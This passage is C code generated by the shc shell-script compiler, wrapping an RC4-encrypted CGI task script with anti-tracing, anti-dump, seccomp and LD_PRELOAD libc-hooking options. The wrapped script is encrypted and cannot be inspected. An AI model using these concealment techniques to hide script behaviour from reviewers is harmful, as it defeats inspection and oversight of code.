#if 0
	shc Version 4.0.3, Generic Shell Script Compiler
	GNU GPL Version 3 Md Jahidul Hamid <jahidulhamid@yahoo.com>

	shc -r -f /tmp/cgi-bin/Task/butler_associated_to_task.sh 
#endif

static  char data [] = 
#define      date_z	1
#define      date	((&data[0]))
	"\134"
#define      xecc_z	15
#define      xecc	((&data[3]))
	"\212\070\377\370\014\310\164\162\214\042\052\001\345\301\062\360"
	"\257\317\134"
#define      msg1_z	65
#define      msg1	((&data[29]))
	"\065\053\025\032\151\164\071\213\110\165\105\365\106\326\174\263"
	"\167\360\327\040\232\013\130\012\361\007\022\311\363\214\321\271"
	"\204\013\260\264\263\154\345\010\040\360\370\277\133\153\021\144"
	"\071\055\046\265\010\133\214\122\022\070\237\207\216\346\377\313"
	"\302\266\016\367\155\214\376\077\336\265\317\342\121\150\026\131"
	"\126\236"
#define      tst2_z	19
#define      tst2	((&data[104]))
	"\150\341\324\073\210\024\262\353\210\175\333\136\364\073\116\201"
	"\345\273\244\243\320\123\013\153"
#define      chk1_z	22
#define      chk1	((&data[131]))
	"\253\147\101\340\222\123\352\213\307\131\077\011\130\164\277\344"
	"\004\235\233\304\163\330\137\277\324\056\366\127\373\374\313"
#define      shll_z	10
#define      shll	((&data[158]))
	"\003\216\206\340\301\276\016\104\354\240\267"
#define      lsto_z	1
#define      lsto	((&data[168]))
	"\266"
#define      tst1_z	22
#define      tst1	((&data[173]))
	"\040\242\114\305\131\032\032\020\173\014\067\053\301\362\376\316"
	"\224\227\060\147\132\311\350\022\115\040\013\055\030\026"
#define      msg2_z	19
#define      msg2	((&data[202]))
	"\141\117\131\171\314\317\005\217\140\025\277\276\123\232\073\233"
	"\146\350\053\322\171\320\242\060\353\371"
#define      inlo_z	3
#define      inlo	((&data[225]))
	"\254\032\353"
#define      rlax_z	1
#define      rlax	((&data[228]))
	"\262"
#define      opts_z	1
#define      opts	((&data[229]))
	"\002"
#define      text_z	2349
#define      text	((&data[442]))
	"\223\174\241\337\102\254\014\132\303\245\376\265\006\116\016\251"
	"\176\372\243\252\342\150\012\123\102\156\056\201\076\212\200\321"
	"\007\042\261\111\316\275\244\222\143\243\107\151\361\126\023\160"
	"\120\266\032\063\037\045\206\142\223\264\344\322\077\144\244\107"
	"\207\125\220\125\023\065\350\166\330\057\340\311\205\363\072\326"
	"\252\124\011\312\172\220\054\015\105\020\340\204\165\204\313\374"
	"\332\134\122\356\221\072\144\151\152\104\063\360\070\155\306\342"
	"\302\320\255\074\140\331\112\245\352\052\052\137\257\366\134\212"
	"\123\256\170\344\350\334\116\122\041\202\102\132\357\011\075\262"
	"\332\352\356\072\304\071\340\256\144\013\016\023\001\152\236\124"
	"\030\026\071\001\363\210\124\025\012\226\157\372\240\254\255\172"
	"\227\233\265\133\325\226\011\071\241\027\115\243\201\353\370\232"
	"\002\062\233\366\272\360\013\305\206\173\277\047\047\155\242\276"
	"\011\127\032\336\315\113\334\020\065\104\062\207\376\014\114\066"
	"\102\203\344\002\141\234\261\076\177\321\362\132\306\024\044\066"
	"\055\142\051\237\264\022\046\260\137\304\272\165\052\164\003\245"
	"\221\046\140\317\365\174\237\113\316\062\374\211\116\341\327\125"
	"\174\175\250\143\353\106\341\273\254\204\304\111\117\075\206\366"
	"\244\232\333\147\316\014\055\110\156\107\363\245\270\175\160\334"
	"\101\167\036\102\123\005\005\240\275\304\216\042\052\066\103\247"
	"\104\154\056\022\035\260\213\007\131\067\220\042\365\325\357\357"
	"\215\012\122\200\216\236\066\207\362\123\206\051\277\106\350\110"
	"\314\223\236\174\350\300\174\075\327\121\062\106\257\362\360\155"
	"\020\276\104\172\334\010\024\044\240\212\271\300\133\157\301\235"
	"\222\136\225\311\220\340\231\101\057\107\253\222\227\312\046\226"
	"\107\277\114\362\007\165\074\237\350\237\346\323\215\167\166\356"
	"\030\246\260\017\364\067\343\102\062\237\252\337\023\341\132\275"
	"\332\305\126\315\223\264\302\174\025\300\275\011\241\245\262\307"
	"\111\376\141\230\103\251\076\040\071\216\305\300\323\156\027\053"
	"\003\337\224\264\231\253\016\315\041\142\163\153\321\346\362\301"
	"\164\056\353\027\225\040\345\165\323\173\211\120\155\033\241\373"
	"\315\216\112\214\036\373\133\356\133\360\305\332\233\057\125\233"
	"\371\367\323\326\370\353\146\352\143\224\027\327\334\044\313\346"
	"\142\070\025\025\034\321\140\066\313\072\261\141\045\125\300\252"
	"\203\215\161\015\117\051\362\126\105\316\051\325\243\041\211\243"
	"\375\353\212\152\252\372\043\243\373\222\135\176\124\300\331\077"
	"\234\017\271\367\200\350\145\304\244\010\131\272\231\025\103\343"
	"\263\211\201\017\370\260\364\301\337\373\311\134\007\156\254\364"
	"\055\273\021\111\125\056\013\220\123\266\137\066\247\134\363\231"
	"\262\062\247\020\016\272\001\250\170\247\143\300\063\270\353\107"
	"\046\253\161\376\036\350\253\064\145\357\036\353\102\077\110\373"
	"\234\124\004\142\325\352\333\243\134\306\243\110\057\305\001\353"
	"\306\377\001\147\321\240\150\022\120\037\114\101\140\245\100\243"
	"\157\302\047\351\007\272\334\375\370\216\316\361\060\046\267\331"
	"\230\332\104\216\342\033\050\161\242\144\254\254\043\323\141\103"
	"\363\176\161\262\161\161\036\253\137\077\223\134\022\111\004\007"
	"\206\156\370\314\063\325\372\234\340\201\000\260\032\144\154\303"
	"\264\372\214\033\175\016\131\324\233\347\134\364\370\144\001\305"
	"\262\153\206\136\016\021\065\222\301\073\337\225\354\130\153\241"
	"\032\325\152\152\041\036\014\221\341\074\223\220\336\135\253\071"
	"\204\021\212\234\222\133\061\221\310\300\345\153\126\035\263\336"
	"\226\067\122\322\210\244\014\177\074\264\355\151\344\043\174\365"
	"\241\260\210\022\167\123\122\373\240\175\366\242\257\053\207\314"
	"\332\052\032\343\011\252\170\177\252\142\042\127\152\071\232\277"
	"\230\236\315\310\304\150\151\250\102\252\065\333\256\251\146\167"
	"\321\172\167\230\106\315\167\061\251\241\041\300\126\254\245\175"
	"\120\132\262\054\347\003\061\340\226\320\056\331\155\152\214\363"
	"\336\135\343\114\146\235\345\055\373\077\151\121\054\060\255\243"
	"\263\223\342\373\253\211\201\270\116\217\276\205\200\051\254\176"
	"\015\200\136\064\110\241\147\223\221\331\122\031\107\076\167\236"
	"\056\037\047\107\334\261\273\315\246\107\044\163\305\156\323\225"
	"\346\337\346\073\060\162\077\037\071\334\373\355\025\327\364\004"
	"\204\261\051\272\376\011\370\301\045\273\054\344\350\356\174\333"
	"\302\277\261\334\210\326\243\061\364\150\174\212\002\063\374\176"
	"\221\001\333\321\151\123\363\272\214\013\273\345\334\162\103\020"
	"\110\177\003\276\041\260\264\042\123\036\074\304\103\205\203\156"
	"\032\115\047\137\277\034\372\156\122\125\165\276\322\275\375\063"
	"\146\274\147\315\311\242\171\055\365\241\123\034\364\070\306\246"
	"\377\337\051\217\374\007\127\072\045\327\132\132\350\212\070\240"
	"\256\034\200\276\141\316\141\301\377\022\200\301\104\273\265\015"
	"\044\265\264\352\014\320\045\016\001\157\341\273\067\235\067\362"
	"\170\376\360\266\112\306\136\341\325\274\173\325\344\044\212\256"
	"\202\110\371\311\165\334\203\214\364\111\051\267\213\317\107\151"
	"\276\044\156\043\124\136\246\016\171\251\126\116\003\174\014\261"
	"\274\213\007\005\060\256\145\241\226\041\134\214\003\133\273\076"
	"\127\256\016\131\215\222\152\202\302\107\017\115\037\055\021\201"
	"\305\272\361\321\107\350\114\100\365\270\060\157\160\304\327\167"
	"\302\160\050\010\042\140\315\067\014\101\200\061\144\377\024\354"
	"\144\000\335\340\361\131\376\337\337\105\105\323\125\317\340\217"
	"\064\230\277\360\140\337\147\102\177\166\263\372\007\072\336\101"
	"\031\137\040\101\174\240\355\210\266\325\167\206\123\221\005\207"
	"\017\333\104\113\120\000\106\142\071\350\171\205\171\152\050\117"
	"\134\117\024\107\063\265\355\377\257\065\012\013\345\032\327\224"
	"\163\122\131\002\315\076\162\135\053\356\166\171\315\125\136\213"
	"\046\247\103\364\237\012\326\042\143\326\105\121\103\270\075\160"
	"\211\054\347\235\060\217\100\222\050\175\213\037\351\007\061\331"
	"\342\113\123\037\347\074\251\176\156\017\050\110\314\305\032\216"
	"\017\210\225\307\321\161\232\011\163\330\151\072\375\103\220\346"
	"\221\145\011\057\076\330\227\166\372\117\126\353\143\342\166\264"
	"\063\102\230\247\172\265\001\175\110\034\010\126\253\233\037\362"
	"\031\177\220\210\135\032\227\177\210\074\137\344\070\277\222\312"
	"\353\207\350\244\274\007\227\210\274\241\147\025\116\116\016\214"
	"\105\107\365\006\261\012\161\107\320\104\025\232\364\141\045\011"
	"\332\155\355\303\202\061\341\063\033\216\351\013\045\342\020\240"
	"\245\207\132\261\352\132\147\034\340\214\301\352\050\016\352\264"
	"\331\241\163\260\354\254\247\346\055\002\034\337\273\344\307\144"
	"\267\214\002\113\061\335\056\176\255\272\154\033\351\036\100\171"
	"\221\141\171\316\243\314\133\002\356\052\314\305\105\017\337\172"
	"\324\251\033\235\261\316\001\077\036\317\156\374\123\323\265\373"
	"\207\305\054\241\001\310\033\214\015\060\164\277\155\011\207\146"
	"\117\015\205\100\043\356\205\141\171\153\263\067\071\014\242\365"
	"\233\354\325\126\266\072\346\035\125\025\023\031\167\104\011\275"
	"\152\006\350\251\040\126\027\304\125\305\276\050\112\343\006\300"
	"\120\233\153\154\320\333\260\351\207\176\065\321\174\216\275\206"
	"\076\332\354\354\253\310\316\102\351\244\112\121\213\074\006\106"
	"\210\360\253\072\071\057\322\327\142\267\230\101\351\141\123\145"
	"\070\261\246\026\343\245\137\241\076\315\030\145\270\111\203\007"
	"\321\235\156\017\271\144\024\315\011\316\211\316\311\360\222\042"
	"\225\353\323\075\127\355\254\144\002\350\203\130\206\116\004\166"
	"\027\152\322\075\062\021\136\144\306\273\241\166\370\302\334\002"
	"\176\264\066\373\127\216\061\050\376\047\061\373\355\342\324\354"
	"\246\137\125\377\055\072\173\301\340\173\242\160\166\252\105\120"
	"\311\355\362\272\140\307\166\017\135\342\213\173\222\065\242\267"
	"\330\064\354\261\367\140\104\343\154\245\020\275\014\212\033\363"
	"\177\243\046\051\251\071\026\235\104\157\146\330\055\050\123\170"
	"\020\217\135\101\032\243\156\216\273\025\235\036\021\045\205\112"
	"\306\306\320\077\135\344\136\301\140\172\042\225\210\053\202\373"
	"\150\133\315\124\066\065\173\257\241\370\150\253\232\057\203\120"
	"\333\043\006\067\326\245\247\331\122\070\070\244\221\176\036\073"
	"\104\110\264\325\357\163\310\153\162\240\344\355\324\357\372\266"
	"\175\267\222\233\121\276\371\142\207\312\323\075\275\156\343\141"
	"\077\076\030\306\262\165\046\030\047\320\132\031\067\253\275\330"
	"\200\312\004\312\022\210\100\111\044\101\103\117\312\256\302\172"
	"\104\370\150\352\137\146\170\232\353\247\270\304\060\105\161\051"
	"\227\316\004\357\253\046\262\120\216\367\220\237\355\121\276\157"
	"\320\170\222\271\323\160\322\303\275\160\106\364\251\070\172\025"
	"\064\313\257\252\057\331\353\247\204\043\235\327\344\120\364\256"
	"\141\014\031\275\004\265\007\122\130\122\261\216\203\102\373\160"
	"\255\317\030\171\371\276\101\270\146\204\167\044\222\100\340\054"
	"\307\201\042\127\315\335\336\176\332\116\223\041\143\351\135\125"
	"\002\245\242\072\046\064\153\000\063\153\242\166\376\034\141\242"
	"\116\375\261\153\130\261\143\155\303\071\234\060\157\216\222\146"
	"\272\337\021\140\143\240\112\202\365\354\177\236\347\313\311\220"
	"\156\000\043\201\331\362\240\300\200\136\376\343\257\321\152\165"
	"\364\275\250\067\273\131\361\120\276\022\354\222\034\250\172\211"
	"\374\043\157\204\152\353\032\363\360\152\336\277\005\215\122\067"
	"\275\326\063\134\315\346\204\220\143\317\225\212\137\267\002\121"
	"\305\210\105\176\305\244\217\325\140\175\170\255\324\350\373\112"
	"\104\342\244\113\117\370\070\121\165\201\012\065\120\307\327\031"
	"\131\250\033\341\107\162\345\033\353\166\321\114\123\054\213\056"
	"\052\150\050\340\255\336\132\235\125\230\177\320\137\002\212\173"
	"\140\164\222\053\272\107\255\321\320\114\006\226\023\264\114\060"
	"\157\010\007\210\066\026\312\343\146\246\270\311\306\337\301\271"
	"\240\123\266\150\046\365\013\112\257\122\163\361\254\110\230\161"
	"\177\140\364\062\173\134\044\162\371\304\221\346\024\044\002\264"
	"\111\326\364\127\217\257\230\136\205\266\301\355\164\250\134\163"
	"\300\377\036\250\246\272\215\136\305\125\343\107\314\042\154\316"
	"\037\150\316\076\251\372\106\212\323\074\204\332\217\260\166\350"
	"\162\372\203\065\066\037\262\320\221\276\005\147\123\065\244\133"
	"\345\177\064\363\236\150\206\304\373\032\055\344\243\317\117\164"
	"\373\274\323\305\364\056\351\044\112\377\337\374\314\342\062\255"
	"\042\327\273\074\234\217\375\371\261\000\073\236\172\235\077\172"
	"\126\112\207\346\000\316\357\145\024\025\034\162\206\173\307\066"
	"\176\150\215\160\346\041\232\063\317\037\113\050\133\061\157\060"
	"\137\341\120\151\374\325\160\331\137\255\135\373\061\265\257\341"
	"\112\275\164\166\236\374\374\135\277\266\357\363\021\207\277\260"
	"\315\162\172\030\322\021\255\341\304\350\244\357\141\363\162\120"
	"\274\020\201\123\306\327\060\171\120\300\067\031\213\341\016\257"
	"\241\275\271\005\035\126\204\321\116\370\237\215\363\324\116\027"
	"\264\251\013\235\377\365\030\120\233\335\345\113\216\145\111\206"
	"\213\355\043\027\217\073\144\063\275\117\053\130\122\135\363\110"
	"\027\343\123\335\152\316\235\222\366\012\064\265\023\214\317\361"
	"\172\363\011\011\056\155\074\354\275\150\104\017\305\070\127\335"
	"\034\253\272\207\172\127\031\161\142\116\046\165\332\366\146\124"
	"\351\157\135\030\335\232\005\232\002\111\252\310\201\001\246\235"
	"\254\140\044\047\270\076\230\032\214\276\220\146\265\366\273\237"
	"\146\030\267\104\263\275\337\266\006\211\176\210\212\044\045\067"
	"\205\112\136\076\211\366\131\025\265\351\174\152\340\067\011\107"
	"\120\301\213\004\176\152\272\205\363\071\015\176\136\063\265\343"
	"\175\024\042\007\012\173\035\300\144\231\052\105\321\064\214\042"
	"\365\027\046\164\202\340\371\165\031\006\364\170\071\252\134\267"
	"\276\176\276\311\372\334\211\137\165\264\244\107\350\060\151\336"
	"\110\220\123\312\160\114\100\212\123\065\003\215\337\137\105\236"
	"\335\004\147\330\340\361\067\126\245\333\235\216\014\007\155\125"
	"\227\300\040\010\015\140\223\140\226\226\356\165\365\063\023\323"
	"\070\173\253\030\154\342\156\022\276\014\240\313\023\015\040\253"
	"\316\100\263\333\241\107\074\067\335\052\254\322\136\300\246\226"
	"\073\121\257\250\064\036\272\362\052\133\275\076\151\336\351\067"
	"\036\235\023\277\344\117\366\302\172\243\224\330\144\072\157\240"
	"\214\036\110\300\075\003\263\147\137\161\246\310\117\217\000\156"
	"\055\023\055\022\143\044\324\335\310\151\265\055\244\045\315\060"
	"\104\026\361\201\031\245\350\170\026\216\101\146\036\101\324\114"
	"\125\002\137\270\047\063\225\357\235\113\034\101\161\352\162\265"
	"\000\144\066\031\011\037\222\037\256\323\206\315\025\132\032\152"
	"\135\171\043\204\255\271\164\112\004\221\214\166\173\377\053\173"
	"\143\142\225\154\202\050\214\061\373\022\376\021\155\031\174\313"
	"\222\237\117\100\131\304\213\135\125\027\323\321\027\377\115\172"
	"\141\342\347\344\012\164\025\006\207\023\027\365\055\224\300\277"
	"\063\020\000\214\324\213\352\051\243\276\373\272\276\110\065\040"
	"\052\034\004\065\220\031\074\027\055\124\015\132\350\315\032\033"
	"\335\032\250\261\246\223\333\111\122\326\003\020\036\070\060\111"
	"\125\065\177\346\116\273\376\173\017\013\326\367\330\360\023\266"
	"\013\274\147\261\117\103\372\241\032\376\262\070\067\343\202\214"
	"\030\001\163\146\274\161\342\313\175\271\303\125\251\326\014\265"
	"\222\164\146\342\267\141\204\321\137\066\012\226\031\214\043\061"
	"\216\227\230\112\010\173\026\205\064\332\333\336\260\347\223\103"
	"\133\371\045\023\132\251\345\272\337\357"
#define      chk2_z	19
#define      chk2	((&data[3380]))
	"\164\053\012\013\101\230\131\077\037\330\353\167\150\375\170\304"
	"\331\020\223\203\132\136\277\303\125"
#define      pswd_z	256
#define      pswd	((&data[3416]))
	"\232\162\106\166\121\367\136\344\072\272\335\137\315\070\011\123"
	"\033\370\077\103\066\110\152\350\334\062\215\377\276\352\037\004"
	"\114\264\132\216\112\325\332\137\335\061\125\031\157\345\155\213"
	"\335\254\316\024\365\070\375\321\153\213\321\052\165\361\056\301"
	"\245\210\120\360\135\053\117\073\134\245\125\313\212\302\126\147"
	"\157\045\174\145\136\171\067\311\005\010\363\172\371\041\074\237"
	"\251\215\217\007\270\336\103\025\203\230\341\016\132\070\166\312"
	"\135\362\057\273\154\146\204\161\157\167\354\150\231\050\010\103"
	"\265\227\112\156\166\215\203\372\045\144\010\200\234\176\112\371"
	"\161\172\264\336\340\071\117\117\260\074\270\112\144\300\215\032"
	"\130\327\211\316\145\014\311\213\161\322\013\015\120\126\007\302"
	"\320\274\240\261\365\360\000\246\054\271\360\221\171\175\254\321"
	"\125\065\240\272\101\152\105\262\074\121\300\215\247\310\117\170"
	"\204\360\051\171\340\051\040\015\342\020\236\134\216\112\056\343"
	"\200\317\236\302\071\343\165\166\065\065\004\334\375\124\124\202"
	"\104\175\374\045\247\034\062\212\055\321\347\273\034\025\237\234"
	"\345\076\136\036\041\323\225\127\011\231\063\007\355\210\211\263"
	"\362\351\242\103\342\037\270\015\052\304\321\200\331\017\354\163"
	"\202\062\352\324\051\110\270\144\002\226"/* End of data[] */;
#define      hide_z	4096
#define SETUID 0	/* Define as 1 to call setuid(0) at start of script */
#define DEBUGEXEC	0	/* Define as 1 to debug execvp calls */
#define TRACEABLE	1	/* Define as 1 to enable ptrace the executable */
#define HARDENING	0	/* Define as 1 to disable ptrace/dump the executable */
#define BUSYBOXON	0	/* Define as 1 to enable work with busybox */

#if HARDENING
static const char * shc_x[] = {
"/*",
" * Copyright 2019 - Intika <intika@librefox.org>",
" * Replace ******** with secret read from fd 21",
" * Also change arguments location of sub commands (sh script commands)",
" * gcc -Wall -fpic -shared -o shc_secret.so shc_secret.c -ldl",
" */",
"",
"#define _GNU_SOURCE /* needed to get RTLD_NEXT defined in dlfcn.h */",
"#define PLACEHOLDER \"********\"",
"#include <dlfcn.h>",
"#include <stdlib.h>",
"#include <string.h>",
"#include <unistd.h>",
"#include <stdio.h>",
"#include <signal.h>",
"",
"static char secret[128000]; //max size",
"typedef int (*pfi)(int, char **, char **);",
"static pfi real_main;",
"",
"// copy argv to new location",
"char **copyargs(int argc, char** argv){",
"    char **newargv = malloc((argc+1)*sizeof(*argv));",
"    char *from,*to;",
"    int i,len;",
"",
"    for(i = 0; i<argc; i++){",
"        from = argv[i];",
"        len = strlen(from)+1;",
"        to = malloc(len);",
"        memcpy(to,from,len);",
"        // zap old argv space",
"        memset(from,'\\0',len);",
"        newargv[i] = to;",
"        argv[i] = 0;",
"    }",
"    newargv[argc] = 0;",
"    return newargv;",
"}",
"",
"static int mymain(int argc, char** argv, char** env) {",
"    //fprintf(stderr, \"Inject main argc = %d\\n\", argc);",
"    return real_main(argc, copyargs(argc,argv), env);",
"}",
"",
"int __libc_start_main(int (*main) (int, char**, char**),",
"                      int argc,",
"                      char **argv,",
"                      void (*init) (void),",
"                      void (*fini)(void),",
"                      void (*rtld_fini)(void),",
"                      void (*stack_end)){",
"    static int (*real___libc_start_main)() = NULL;",
"    int n;",
"",
"    if (!real___libc_start_main) {",
"        real___libc_start_main = dlsym(RTLD_NEXT, \"__libc_start_main\");",
"        if (!real___libc_start_main) abort();",
"    }",
"",
"    n = read(21, secret, sizeof(secret));",
"    if (n > 0) {",
"      int i;",
"",
"    if (secret[n - 1] == '\\n') secret[--n] = '\\0';",
"    for (i = 1; i < argc; i++)",
"        if (strcmp(argv[i], PLACEHOLDER) == 0)",
"          argv[i] = secret;",
"    }",
"",
"    real_main = main;",
"",
"    return real___libc_start_main(mymain, argc, argv, init, fini, rtld_fini, stack_end);",
"}",
"",
0};
#endif /* HARDENING */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* 'Alleged RC4' */

static unsigned char stte[256], indx, jndx, kndx;

/*
 * Reset arc4 stte. 
 */
void stte_0(void)
{
	indx = jndx = kndx = 0;
	do {
		stte[indx] = indx;
	} while (++indx);
}

/*
 * Set key. Can be used more than once. 
 */
void key(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		do {
			tmp = stte[indx];
			kndx += tmp;
			kndx += ptr[(int)indx % len];
			stte[indx] = stte[kndx];
			stte[kndx] = tmp;
		} while (++indx);
		ptr += 256;
		len -= 256;
	}
}

/*
 * Crypt data. 
 */
void arc4(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		indx++;
		tmp = stte[indx];
		jndx += tmp;
		stte[indx] = stte[jndx];
		stte[jndx] = tmp;
		tmp += stte[indx];
		*ptr ^= stte[tmp];
		ptr++;
		len--;
	}
}

/* End of ARC4 */

#if HARDENING

#include <sys/ptrace.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/prctl.h>
#define PR_SET_PTRACER 0x59616d61

/* Seccomp Sandboxing Init */
#include <stdlib.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>

#include <linux/filter.h>
#include <linux/seccomp.h>
#include <linux/audit.h>

#define ArchField offsetof(struct seccomp_data, arch)

#define Allow(syscall) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, SYS_##syscall, 0, 1), \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

struct sock_filter filter[] = {
    /* validate arch */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, ArchField),
    BPF_JUMP( BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),

    /* load syscall */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, nr)),

    /* list of allowed syscalls */
    Allow(exit_group),  /* exits a process */
    Allow(brk),         /* for malloc(), inside libc */
    Allow(mmap),        /* also for malloc() */
    Allow(munmap),      /* for free(), inside libc */

    /* and if we don't match above, die */
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog filterprog = {
    .len = sizeof(filter)/sizeof(filter[0]),
    .filter = filter
};

/* Seccomp Sandboxing - Set up the restricted environment */
void seccomp_hardening() {
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
        perror("Could not start seccomp:");
        exit(1);
    }
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filterprog) == -1) {
        perror("Could not start seccomp:");
        exit(1);
    }
} 
/* End Seccomp Sandboxing Init */

void shc_x_file() {
    FILE *fp;
    int line = 0;

    if ((fp = fopen("/tmp/shc_x.c", "w")) == NULL ) {exit(1); exit(1);}
    for (line = 0; shc_x[line]; line++)	fprintf(fp, "%s\n", shc_x[line]);
    fflush(fp);fclose(fp);
}

int make() {
	char * cc, * cflags, * ldflags;
    char cmd[4096];

	cc = getenv("CC");
	if (!cc) cc = "cc";

	sprintf(cmd, "%s %s -o %s %s", cc, "-Wall -fpic -shared", "/tmp/shc_x.so", "/tmp/shc_x.c -ldl");
	if (system(cmd)) {remove("/tmp/shc_x.c"); return -1;}
	remove("/tmp/shc_x.c"); return 0;
}

void arc4_hardrun(void * str, int len) {
    //Decode locally
    char tmp2[len];
    char tmp3[len+1024];
    memcpy(tmp2, str, len);

	unsigned char tmp, * ptr = (unsigned char *)tmp2;
    int lentmp = len;
    int pid, status;
    pid = fork();

    shc_x_file();
    if (make()) {exit(1);}

    setenv("LD_PRELOAD","/tmp/shc_x.so",1);

    if(pid==0) {

        //Start tracing to protect from dump & trace
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
            kill(getpid(), SIGKILL);
            _exit(1);
        }

        //Decode Bash
        while (len > 0) {
            indx++;
            tmp = stte[indx];
            jndx += tmp;
            stte[indx] = stte[jndx];
            stte[jndx] = tmp;
            tmp += stte[indx];
            *ptr ^= stte[tmp];
            ptr++;
            len--;
        }

        //Do the magic
        sprintf(tmp3, "%s %s", "'********' 21<<<", tmp2);

        //Exec bash script //fork execl with 'sh -c'
        system(tmp2);

        //Empty script variable
        memcpy(tmp2, str, lentmp);

        //Clean temp
        remove("/tmp/shc_x.so");

        //Sinal to detach ptrace
        ptrace(PTRACE_DETACH, 0, 0, 0);
        exit(0);
    }
    else {wait(&status);}

    /* Seccomp Sandboxing - Start */
    seccomp_hardening();

    exit(0);
}
#endif /* HARDENING */

/*
 * Key with file invariants. 
 */
int key_with_file(char * file)
{
	struct stat statf[1];
	struct stat control[1];

	if (stat(file, statf) < 0)
		return -1;

	/* Turn on stable fields */
	memset(control, 0, sizeof(control));
	control->st_ino = statf->st_ino;
	control->st_dev = statf->st_dev;
	control->st_rdev = statf->st_rdev;
	control->st_uid = statf->st_uid;
	control->st_gid = statf->st_gid;
	control->st_size = statf->st_size;
	control->st_mtime = statf->st_mtime;
	control->st_ctime = statf->st_ctime;
	key(control, sizeof(control));
	return 0;
}

#if DEBUGEXEC
void debugexec(char * sh11, int argc, char ** argv)
{
	int i;
	fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
	fprintf(stderr, "argc=%d\n", argc);
	if (!argv) {
		fprintf(stderr, "argv=<null>\n");
	} else { 
		for (i = 0; i <= argc ; i++)
			fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
	}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
	for (; argv && *argv && *argv != arg; argv++);
	for (; argv && *argv; argv++)
		*argv = argv[1];
}

void chkenv_end(void);

int chkenv(int argc)
{
	char buff[512];
	unsigned long mask, m;
	int l, a, c;
	char * string;
	extern char ** environ;

	mask = (unsigned long)getpid();
	stte_0();
	 key(&chkenv, (void*)&chkenv_end - (void*)&chkenv);
	 key(&data, sizeof(data));
	 key(&mask, sizeof(mask));
	arc4(&mask, sizeof(mask));
	sprintf(buff, "x%lx", mask);
	string = getenv(buff);
#if DEBUGEXEC
	fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
	l = strlen(buff);
	if (!string) {
		/* 1st */
		sprintf(&buff[l], "=%lu %d", mask, argc);
		putenv(strdup(buff));
		return 0;
	}
	c = sscanf(string, "%lu %d%c", &m, &a, buff);
	if (c == 2 && m == mask) {
		/* 3rd */
		rmarg(environ, &string[-l - 1]);
		return 1 + (argc - a);
	}
	return -1;
}

void chkenv_end(void){}

#if HARDENING

static void gets_process_name(const pid_t pid, char * name) {
	char procfile[BUFSIZ];
	sprintf(procfile, "/proc/%d/cmdline", pid);
	FILE* f = fopen(procfile, "r");
	if (f) {
		size_t size;
		size = fread(name, sizeof (char), sizeof (procfile), f);
		if (size > 0) {
			if ('\n' == name[size - 1])
				name[size - 1] = '\0';
		}
		fclose(f);
	}
}

void hardening() {
    prctl(PR_SET_DUMPABLE, 0);
    prctl(PR_SET_PTRACER, -1);

    int pid = getppid();
    char name[256] = {0};
    gets_process_name(pid, name);

    if (   (strcmp(name, "bash") != 0) 
        && (strcmp(name, "/bin/bash") != 0) 
        && (strcmp(name, "sh") != 0) 
        && (strcmp(name, "/bin/sh") != 0) 
        && (strcmp(name, "sudo") != 0) 
        && (strcmp(name, "/bin/sudo") != 0) 
        && (strcmp(name, "/usr/bin/sudo") != 0)
        && (strcmp(name, "gksudo") != 0) 
        && (strcmp(name, "/bin/gksudo") != 0) 
        && (strcmp(name, "/usr/bin/gksudo") != 0) 
        && (strcmp(name, "kdesu") != 0) 
        && (strcmp(name, "/bin/kdesu") != 0) 
        && (strcmp(name, "/usr/bin/kdesu") != 0) 
       )
    {
        printf("Operation not permitted\n");
        kill(getpid(), SIGKILL);
        exit(1);
    }
}

#endif /* HARDENING */

#if !TRACEABLE

#define _LINUX_SOURCE_COMPAT
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>

#if !defined(PT_ATTACHEXC) /* New replacement for PT_ATTACH */
   #if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
       #define PT_ATTACHEXC	PT_ATTACH
   #elif defined(PTRACE_ATTACH)
       #define PT_ATTACHEXC PTRACE_ATTACH
   #endif
#endif

void untraceable(char * argv0)
{
	char proc[80];
	int pid, mine;

	switch(pid = fork()) {
	case  0:
		pid = getppid();
		/* For problematic SunOS ptrace */
#if defined(__FreeBSD__)
		sprintf(proc, "/proc/%d/mem", (int)pid);
#else
		sprintf(proc, "/proc/%d/as",  (int)pid);
#endif
		close(0);
		mine = !open(proc, O_RDWR|O_EXCL);
		if (!mine && errno != EBUSY)
			mine = !ptrace(PT_ATTACHEXC, pid, 0, 0);
		if (mine) {
			kill(pid, SIGCONT);
		} else {
			perror(argv0);
			kill(pid, SIGKILL);
		}
		_exit(mine);
	case -1:
		break;
	default:
		if (pid == waitpid(pid, 0, 0))
			return;
	}
	perror(argv0);
	_exit(1);
}
#endif /* !TRACEABLE */

char * xsh(int argc, char ** argv)
{
	char * scrpt;
	int ret, i, j;
	char ** varg;
	char * me = argv[0];
	if (me == NULL) { me = getenv("_"); }
